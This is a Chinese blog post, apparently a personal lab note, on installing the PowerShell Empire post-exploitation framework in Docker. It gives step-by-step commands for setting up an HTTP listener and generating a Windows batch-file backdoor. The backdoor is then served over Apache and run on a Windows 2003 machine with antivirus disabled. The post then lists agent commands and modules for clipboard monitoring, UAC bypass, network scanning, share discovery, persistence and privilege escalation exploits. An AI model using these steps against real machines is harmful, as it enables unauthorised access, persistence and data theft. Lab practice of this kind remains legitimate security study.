Empire的安装与使用

最新推荐文章于 2024-05-06 14:11:17 发布
最新推荐文章于 2024-05-06 14:11:17 发布
阅读量1k 收藏 11
点赞数 28
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/npc88888/article/details/136782698
版权

一.安装Empire

我用了Dendian 10.x和CentOs来下载都不行,要用docker容器

下载docker容器

sudo apt update
sudo apt install docker.io

安装过程看这个

docker安装empire2.5_docker run -it -p 7000:7000 --name empire empirepr-CSDN博客

二.使用Empire

启动docker容器

docker run -it -p 7000:7000 --name empire empireproject/empire /bin/bash
sudo ./setup/reset.sh
sudo /usr/local/bin/pip2.7 install pefile
sudo ./empire

开启empire容器

docker start 4c6f1f1ceb028a9edb62b6a99cbf516560071359fd6cfa47866c8697eb3b4f3c

docker exec -it 4c6f1f1ceb028a9edb62b6a99cbf516560071359fd6cfa47866c8697eb3b4f3c /bin/bash

./empire

1.打开监听器

(因为我的empire是在docker中运行的,所以监听器的ip要用本机的ip地址,请求由本机的7000端口发送)

详情见:docker下安装Empire与Empire简单使用 - summer14 - 博客园 (cnblogs.com)

Listeners进入监听器 按tab键可以补全命令

Uselistener 选择监听器 + tab补全

Uselistener http进入监听器的http模块

Info 查看http模块的信息

Set Name Test

Set Host http://ip:8888 设置监听器信息

Set Port 8888

Stagingkey 是随机生成匹配用的

Execute 执行

Back 退出监听器,list可以查看有多少个监听器,kill test 可以删除名为test的监听器

2.Tager 生成后门

Usestager + tab 显示管理后门的模块

Usestager windows/launcher_bat 选择windows/launcher_bat模块

Info 查看参数

Help 看帮助文档

Listeners 查看有什么监听器

Set Listener test 设置监听器为test

Set OutFile /var/www/html/launcher.bat

Execute 生成文件到/var/www/html/launcher.bat目录内容是Shell,木马

因为这个文件生成在empire容器内,是访问不到的,要把这个文件移动到~/var/www/html

启动apache2

/etc/init.d/apache2 start

开启windows 2003

浏览器下载http://ip//launcher.bat杀毒都关了

点击运行launcher木马文件

太老的操作系统用不了这木马命令

打开linux可以看到已经连接上了windows 2003进行会话

Agents查看当前活动代理,windows 2003主机信息

Interact 选择一个当前会话

Rename GS9CDTMR win11 改变会话名字为win11

Info 查看信息

Sysinfo 查看windows 2003 的主机信息如ip,操作系统等

Help agentcmds 查看shell命令,然后直接用就行

如:del test.txt删除文件,upload test.txt(文件要放在Empire目录下),cat test.txt 查看文件内容,sc截屏命令,截屏以后保存在显示的文件夹内

如果没见听到:

interact wind7

Bypassuac test

使用 list stale 命令 列出已经丢失的反弹主机,然后输入remove stale 命令删除已经失效的主机

剪切板usemodule collection/clipboard_monitor

Set PollInterval 1 一分钟刷新记录,一分钟内剪切板有内容就显示在linux上

Execute 执行

三.常见模块的使用

Agents   进入会话

Agents list     查看会话

Ineract Z9…   选择会话

Sysinfo   查看系统信息

Sleep 0   间隔时间设为0,马上执行我们的操作

  1. 主机发现

arp扫描

situational_awareness/network/arpscan

set Range 192.168.0.1-192.168.0.100

execute

smb扫描

network/smbscanner

  1. 端口扫描

usemodule situational_awareness/network/portscan

  1. 查找本地管理员的主机

situational_awareness/network/powerview/find_localadmin_access

  1. 查看共享文件

situational_awareness/network/powerview/share_finder

  1. 本地信息收集

situational_awareness/host/winenum

  1. 提权

bypassuac

privesc/bypassuac

扫描环境向量提权

privesc/powerup/allchecks

计划任务system提权

persistence/elevated/schtasks

set Listener test

溢出提权漏洞

powershell/privesc/ms16-032

powershell/privesc/ms16-135

我看就这样吧
关注
  • 28
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
域渗透神器Empire安装和简单使用
2301_77147728的博客
03-30 326
关于内网渗透,我们平时基本第一时间想到Metasploit,集信息收集,预渗透,渗透,后渗透,木马,社会工程学于一体的平台,但是Empire就是针对内网的渗透,针对powershell,在内网渗透能用到的powershell脚本,全部集成在Empire框架中,其更是域渗透神器。网上关于其介绍的文章寥寥无几,尤其2.0版本,操作和之前的1.6版本等不管是命令啥的都有很大的区别,在网上查了很多外文文献,摸索了半天,在这里做一个笔记,和大家共同进步。然后生成一个dll载荷,生成一个powershell命令。
14、域渗透神器Empire安装和简单使用
Fly_鹏程万里
06-14 6648
1. Empire简介Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents withou...
Empire安装(超详细)
LCX190937的博客
05-01 241
安装最新版的empire(从GitHub上克隆)应该是需要最新版的python,而kali Linux上默认的是python3.11.8但是他也有python3.12.2,我们只用修改一下软连接让python3.12启用即可。
Empire安装和试用
10-12 778
Empire2.0,powershell后渗透利器的安装和试用 https://www.restkhz.com/2017/05/empire-test/ 使用Empire“探索”Windows个人电脑 http://www.freebuf.com/articles/system/133135.html 转载于:https://www.cnblogs.com/xiaozi/p/76...
Web安全攻防渗透测试
m0_63223219的博客
04-05 6867
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 ...
Empire安装,基本介绍,命令使用,监听(一)
single_g_l的博客
03-12 4558
目录 一.​Empire介绍 二. 安装Empire 1.命令安装 2.Git安装 3.Docker安装 三. 基本使用 1. Empire拥有客户端和服务端 2. 客户端操作 1) 基础命令 2)监听器 四. Empire 基础详解(模块,命令) 1.empire 相关命令 2. interact 命令 3. uselistener 监听模块 4. usestager模块(payload) 5. usemodule privesc 提权模块 6.PowerBr...
Empire学习笔记.pdf
09-25
一旦目标主机运行了stager,它将与Empire建立连接,显示在 `agents` 列表中。你可以通过 `interact` 命令控制目标主机,或者使用 `rename` 更改主机名,`remove` 删除不再需要的主机。 Empire还提供了丰富的命令集...
empire-web:PowerShell Empire Web界面
05-14
PowerShell帝国Web PowerShell Empire Web利用。...n要求应该安装PHP Curl以使用Empire Web。安装PHP Curl sudo apt-get install php7.0-curl php5-curl检查PHP Curl 命令行: root@kali:~# php -i | grep
Starkiller:Starkiller是PowerShell Empire的前端
03-20
星际杀手 ...当前已经使用纱1.22.0进行了测试。 yarn install 编译和热重装以进行开发 yarn electron:serve 编译和最小化生产 yarn electron:build # Or to target a specific OS. yarn electron:
Empire-开源
04-26
《帝国》(Empire)是一款深受玩家喜爱的策略游戏,其设计的核心在于通过巧妙的战术布局,以己方势力包围并占领敌人的领土。游戏以其简单易懂的规则和高度的策略性吸引了众多玩家,尤其适合喜欢竞技和思考战略的用户。...
BlueCommand:使用PowerShell Universal仪表板的PowerShell Empire仪表板和工具前端
03-01
警告:该项目几乎不会涉及到与PowerShell Empire的所有功能兼容的表面。 这是一个旨在帮助我学习/试用PowerShell Empire及其REST API的项目。 您将在生活中得到更好的服务,但实际上将学习如何使用PowerShell ...
SST-tool:用于使用Empire Earth SST纹理文件的库和工具
04-13
用于SST图像格式的Empire Earth工具 这是什么? 这是SST和TGA库,结合了用于修改Empire Earth SST图像/纹理格式的新工具,以便替换EE Studio软件的SST转换器 随附软件 SST工具 该软件允许您将SST图像文件转换为TGA...
Holy Empire
10-24
这个文件意味着用户可以将"Holy Empire"字体安装在他们的系统中,用于各种设计项目,如海报、网页设计、广告创意等。TrueType字体的灵活性使其适应性强,可以在各种操作系统和软件中无缝使用。 "Holy Empire"字体的...
Empire_Travel_App
06-22
使用许多代码生成器,尝试使用ember help generate获取更多详细信息 运行测试 ember test ember test --server 建造 ember build (开发) ember build --environment production (生产) 部署 指定部署应用程序...
在kali安装Empire最新(新手必看)
最新发布
m0_62363483的博客
05-06 285
慢慢等它加载,加载完了,再执行一次./install.sh 结束后还要反复执行./install.sh看看所有东西是否下载完了, 过程很漫长。cd Empire/steup,输入:./install.sh (如果第一次安装很可能会出现各种错误)先输入:./ps-empire server (这一步可能会出现很多红色的字,不管吧(•_•))加载好后到另一个终端输入:./ps-empire client。正常现象,多试试,建议早上弄吧,拷贝也可以。
Empire后渗透框架--安装、爬坑记录
venu_s的博客
07-13 574
Empire安装记录 Empire简介 Empire后渗透框架,这个框架是为了内网渗透,主要针对windows内网渗透,这个框架集合了很多powershell内网渗透脚本,它支持域内网渗透,宏钓鱼,内网横行扩展,权限维持,后门生成等 安装环境 Ubuntu 21.04、Anaconda Empire下载 官网 http://www.powershellempire.com/ 下载 https://github.com/EmpireProject/Empire Anaconda下载 官网下载 https:
Empire基础使用
yyj1781572的博客
11-12 1042
Empire基础使用
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值